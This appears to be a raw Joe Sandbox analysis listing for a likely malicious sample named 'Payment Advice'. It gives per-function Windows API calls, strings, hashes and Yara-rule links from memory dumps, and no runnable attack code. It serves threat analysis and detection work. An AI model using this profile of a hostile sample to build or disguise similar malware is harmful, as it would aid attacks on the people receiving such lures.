ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0059B72B,00000000,?,?,0059B2EF,?,?), ref: 005FD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0059B72B,00000000,?,?,0059B2EF,?,?), ref: 005FD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0059B72B,00000000,?,?,0059B2EF,?,?), ref: 005FD90A
DeleteObject.GDI32(00000000), ref: 005FD91C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: d97d03abdb083db8a79764e07f22650ea22515d9c600047ee14710edad2eb354
Instruction ID: 6e7c67b2a69c7add15941d3e29197143f16f80823a10c617e16b65a71a38bf9c
Opcode Fuzzy Hash: d97d03abdb083db8a79764e07f22650ea22515d9c600047ee14710edad2eb354
Instruction Fuzzy Hash: 6C61AA30501605DFFF259F94EA88B36BFB7FB86315F156A19E1868AA70C774A880CB50

Function 0059B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0059B526: GetWindowLongW.USER32(?,000000EB), ref: 0059B537

GetSysColor.USER32(0000000F), ref: 0059B438

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f23608ba094d0ca8cd135711cabaec997df513fe25dc4231f1f7ebd9cee41571
Instruction ID: 3c3842f405700d05fd33e0533a180dde0a0b047e2da532ed4197ad85497f48be
Opcode Fuzzy Hash: f23608ba094d0ca8cd135711cabaec997df513fe25dc4231f1f7ebd9cee41571
Instruction Fuzzy Hash: 6B4180304401449BFF215F68AD89BB93F67BB46721F1443A1FE698E1E6D7348C41EB21

Function 005C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 005C6923
_wcscpy.LIBCMT ref: 005C6934
__wsplitpath.LIBCMT ref: 005C6958
__wsplitpath.LIBCMT ref: 005C6979
_wcscpy.LIBCMT ref: 005C699B
_wcscpy.LIBCMT ref: 005C69B9
_wcscpy.LIBCMT ref: 005C69C7
_wcscat.LIBCMT ref: 005C69D6
_wcscat.LIBCMT ref: 005C6A2B
_wcscat.LIBCMT ref: 005C6A61
_wcscat.LIBCMT ref: 005C6A73

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: d6efabe6b11a33cf60bfe470932f36e96d9598be8e3079556390351417fbd583
Instruction ID: 807180758b2c822bbc7044e25808a5f7ce90c4fd291e95c148bbad03b768a264
Opcode Fuzzy Hash: d6efabe6b11a33cf60bfe470932f36e96d9598be8e3079556390351417fbd583
Instruction Fuzzy Hash: EA414F7788521DAECF61EB90CC45DCFB7BDFB84310F0041A6B649A2081EA30ABE58F50

Function 005CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0061DC00,0061DC00,0061DC00), ref: 005CD7CE
GetDriveTypeW.KERNEL32(?,00633A70,00000061), ref: 005CD898
_wcscpy.LIBCMT ref: 005CD8C2

Strings

ramdisk, xrefs: 005CD842
all, xrefs: 005CD7D4
removable, xrefs: 005CD800
fixed, xrefs: 005CD816
network, xrefs: 005CD82C
cdrom, xrefs: 005CD7EA
unknown, xrefs: 005CD859

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: af8ec4020f3c4405325312231ee264370951b5988819cd1bf55c57f143c47e3a
Instruction ID: 88a6eb18792ac6f813e858c218b4ac4f6df766457b147a65cd56812da64586c1
Opcode Fuzzy Hash: af8ec4020f3c4405325312231ee264370951b5988819cd1bf55c57f143c47e3a
Instruction Fuzzy Hash: 0A515B35104205AFC700EF54D896FAABFB5FF84314F14892DF99A972A2EB31DD05CA92

Function 0058936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 005893AB
__itow.LIBCMT ref: 005893DF

Part of subcall function 005A1557: _xtow@16.LIBCMT ref: 005A1578

Strings

0x%p, xrefs: 005F4CAD
%.15g, xrefs: 005893A5
False, xrefs: 005F4C93
True, xrefs: 005F4C8C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: c2404f84666b2be90b80812e20785f09cd7bd64631efc06bf6e65f09d611770c
Instruction ID: 07bba3e419a02b9477080bcc600469fa9b77c7d0698f70f9ea4a52de26ac7e6e
Opcode Fuzzy Hash: c2404f84666b2be90b80812e20785f09cd7bd64631efc06bf6e65f09d611770c
Instruction Fuzzy Hash: 1841E471500609ABEB24EB74D946E7A7FE8FF89300F24486EE54AE72C1EA319D41CB50

Function 005EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005EA259
CreateCompatibleDC.GDI32(00000000), ref: 005EA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005EA273
SelectObject.GDI32(00000000,00000000), ref: 005EA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 005EA286
DeleteDC.GDI32(00000000), ref: 005EA28F
GetWindowLongW.USER32(?,000000EC), ref: 005EA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005EA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005EA2B9

Strings

static, xrefs: 005EA1F1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: ede9878f007dea550e751671eb3ab5141117eea5dbaab61c1057c184ae9c8169
Instruction ID: c50123f200c9ae222ab8b829fdb60260899dae74e27933576096a9ff08cd32cd
Opcode Fuzzy Hash: ede9878f007dea550e751671eb3ab5141117eea5dbaab61c1057c184ae9c8169
Instruction Fuzzy Hash: C0316735140255ABDF259FA5DC49FEB3F6AFF1A360F110314FA59A60A0CB32E811DBA4

Function 005C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005C6F1D
gethostname.WSOCK32(?,00000100), ref: 005C6F37
gethostbyname.WSOCK32(?), ref: 005C6F44
_wcscpy.LIBCMT ref: 005C6F6C
inet_ntoa.WSOCK32(?), ref: 005C6F8A
_strcat.LIBCMT ref: 005C6F98
_wcscpy.LIBCMT ref: 005C6FAF
WSACleanup.WSOCK32 ref: 005C6FBD
_wcscpy.LIBCMT ref: 005C6FCB

Strings

0.0.0.0, xrefs: 005C6F66

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 81ef003a99e4e96d5e38f916eded2fe12442a7f88aa7108ace0e2914205ea4c1
Instruction ID: 088288368fb0a86d65407fa4b54262f36cf6ee7fae0a9486dda3411a92f2643b
Opcode Fuzzy Hash: 81ef003a99e4e96d5e38f916eded2fe12442a7f88aa7108ace0e2914205ea4c1
Instruction Fuzzy Hash: 6211D27290411AAFCB25ABA0AC4EEDA7FACFB85710F01016DF005A6081EE709A818B51

Function 005A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A5047

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

__gmtime64_s.LIBCMT ref: 005A50E0
__gmtime64_s.LIBCMT ref: 005A5116
__gmtime64_s.LIBCMT ref: 005A5133
__allrem.LIBCMT ref: 005A5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A51A5
__allrem.LIBCMT ref: 005A51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A51DA
__allrem.LIBCMT ref: 005A51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A520F
__invoke_watson.LIBCMT ref: 005A5280

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: bc58b69cd40880e743fc6d9678e17a610dff3ac456ab21abd5b9292ba958d83f
Instruction ID: 753847d4baf8e76f21ab4cb1c6b53a89422dd1ffb0593cf8e9723a82c56578c6
Opcode Fuzzy Hash: bc58b69cd40880e743fc6d9678e17a610dff3ac456ab21abd5b9292ba958d83f
Instruction Fuzzy Hash: 9571D376A00F17ABE7149E78CC99FAE7BA8BF52364F144229E510D6681F770ED408BD0

Function 005C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C4DF8
GetMenuItemInfoW.USER32(00641708,000000FF,00000000,00000030), ref: 005C4E59
SetMenuItemInfoW.USER32(00641708,00000004,00000000,00000030), ref: 005C4E8F
Sleep.KERNEL32(000001F4), ref: 005C4EA1
GetMenuItemCount.USER32(?), ref: 005C4EE5
GetMenuItemID.USER32(?,00000000), ref: 005C4F01
GetMenuItemID.USER32(?,-00000001), ref: 005C4F2B
GetMenuItemID.USER32(?,?), ref: 005C4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005C4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C4FEB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 026490d3f4159797bcb3acbcd761c70153360ccb05ef54ec54eac2e1e2a3d58e
Instruction ID: 4949777c9cfc403f78b200296b0c6ca2e6a6729cca5cfe36e97a11ea99e3ef59
Opcode Fuzzy Hash: 026490d3f4159797bcb3acbcd761c70153360ccb05ef54ec54eac2e1e2a3d58e
Instruction Fuzzy Hash: 08617875900289AFEB21CFE4D898EAE7FA9FB41308F14055DF841A7291E730AD45CF21

Function 005E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005E9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005E9C9B
GetWindowLongW.USER32(?,000000F0), ref: 005E9CBF
_memset.LIBCMT ref: 005E9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005E9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005E9D5A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 29241ec06aaf762dd4359bcc3b69aeb6bf719fdfd3f13e1c2d7b7643b613821b
Instruction ID: 2d4d6cf03203fe27abdec867566abd6ccccb590884e51e6744bba1b238aac525
Opcode Fuzzy Hash: 29241ec06aaf762dd4359bcc3b69aeb6bf719fdfd3f13e1c2d7b7643b613821b
Instruction Fuzzy Hash: 46617BB5900258AFDB14DFA8CC81EEEBBB8FB09704F144159FA44EB291D770AD42DB60

Function 005B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 005B94FE
SafeArrayAllocData.OLEAUT32(?), ref: 005B9549
VariantInit.OLEAUT32(?), ref: 005B955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 005B957B
VariantCopy.OLEAUT32(?,?), ref: 005B95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 005B95D2
VariantClear.OLEAUT32(?), ref: 005B95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 005B95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B95FD
VariantClear.OLEAUT32(?), ref: 005B960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B961A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 12250b4054cd2f06268ba093ebc5cd1bc83343a517a1817e3415aaba3b9c683e
Instruction ID: 48f9f87b2bc7bae2fe194f43399b0fd9b335370f120c34e4504996b7b39ece00
Opcode Fuzzy Hash: 12250b4054cd2f06268ba093ebc5cd1bc83343a517a1817e3415aaba3b9c683e
Instruction Fuzzy Hash: 91414C35940219AFCB01EFE4D8889DEBFB9FF48354F108065E602A3261DB30EA45CBA1

Function 005DBB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005DBB5C
VariantInit.OLEAUT32(?), ref: 005DBC2D
VariantInit.OLEAUT32(?), ref: 005DBD2E
VariantClear.OLEAUT32(?), ref: 005DBD38
VariantClear.OLEAUT32(?), ref: 005DBD99

Strings

h?c, xrefs: 005DBB2D
Incorrect Object type in FOR..IN loop, xrefs: 005DBD11
|?c, xrefs: 005DBB34
Null Object assignment in FOR..IN loop, xrefs: 005DBBBD, 005DBCEB, 005DBDA7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?c$|?c
API String ID: 2862541840-1265341807
Opcode ID: 7d1ae8f87f739281e9e4635a46f4f706a0691498ff1811af118dca5688e5c08c
Instruction ID: 1046820ffee39cd5a577745eba13068eb6df7f06766e88d46b3c2f5a29db4f22
Opcode Fuzzy Hash: 7d1ae8f87f739281e9e4635a46f4f706a0691498ff1811af118dca5688e5c08c
Instruction Fuzzy Hash: 80916E71A00215EBEF34DF99C848FAEBBBABF85710F11855BF515AB290D7709940CBA0

Function 005DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

CoInitialize.OLE32 ref: 005DADF6
CoUninitialize.OLE32 ref: 005DAE01
CoCreateInstance.OLE32(?,00000000,00000017,0060D8FC,?), ref: 005DAE61
IIDFromString.OLE32(?,?), ref: 005DAED4
VariantInit.OLEAUT32(?), ref: 005DAF6E
VariantClear.OLEAUT32(?), ref: 005DAFCF

Strings

Invalid parameter, xrefs: 005DAEED
NULL Pointer assignment, xrefs: 005DAEA6
Failed to create object, xrefs: 005DAE6C, 005DAF22

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: e7fd499b672630ea2b3051416e725da1925c5c08496aade3a941c6072633e315
Instruction ID: b15e3c58ccdba0cf7e7b5b256818b25a659896acfdb3447d81ccf2bc78db33bd
Opcode Fuzzy Hash: e7fd499b672630ea2b3051416e725da1925c5c08496aade3a941c6072633e315
Instruction Fuzzy Hash: 2C6168712083129FD721EF58C888B6BBBE8FF88714F14494AF9859B291D770ED44CB92

Function 005D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005D8168
inet_addr.WSOCK32(?,?,?), ref: 005D81AD
gethostbyname.WSOCK32(?), ref: 005D81B9
IcmpCreateFile.IPHLPAPI ref: 005D81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005D8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005D824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 005D82C2
WSACleanup.WSOCK32 ref: 005D82C8

Strings

Ping, xrefs: 005D81EB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4d62fdc2a78bf377c1839611a7720b697206a827ee95079cad63c1d2dfe8756c
Instruction ID: 6097c2eada604fc386b62ca378a4c8f09e92aee20a4ef882d48fd3c8cd79f4fa
Opcode Fuzzy Hash: 4d62fdc2a78bf377c1839611a7720b697206a827ee95079cad63c1d2dfe8756c
Instruction Fuzzy Hash: 60517D35644601AFDB21AB68CC49B2ABFE5FF88320F04495BF955973A1DB30E905CB42

Function 005CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005CE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 005CE40C
GetLastError.KERNEL32 ref: 005CE416
SetErrorMode.KERNEL32(00000000,READY), ref: 005CE483

Strings

INVALID, xrefs: 005CE455
READY, xrefs: 005CE45C
READONLY, xrefs: 005CE44E
NOTREADY, xrefs: 005CE442
UNKNOWN, xrefs: 005CE43B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: cf86267ab5447ef8462437b6c5db7ef7308cc24dc0106c6293a3b963ecf64872
Instruction ID: 0a8155c83b3b213af63de5bf9cd00ec39bf15fe811f1721bd32827f5dab4b804
Opcode Fuzzy Hash: cf86267ab5447ef8462437b6c5db7ef7308cc24dc0106c6293a3b963ecf64872
Instruction Fuzzy Hash: 18316135A0020A9FDB05EBE4C88AFBEBFB5FF44304F148459E905E7291DB709A42CB91

Function 005BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005BB98C
GetDlgCtrlID.USER32 ref: 005BB997
GetParent.USER32 ref: 005BB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 005BB9B6
GetDlgCtrlID.USER32(?), ref: 005BB9BF
GetParent.USER32(?), ref: 005BB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 005BB9DE

Strings

ComboBox, xrefs: 005BB911
ListBox, xrefs: 005BB949

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
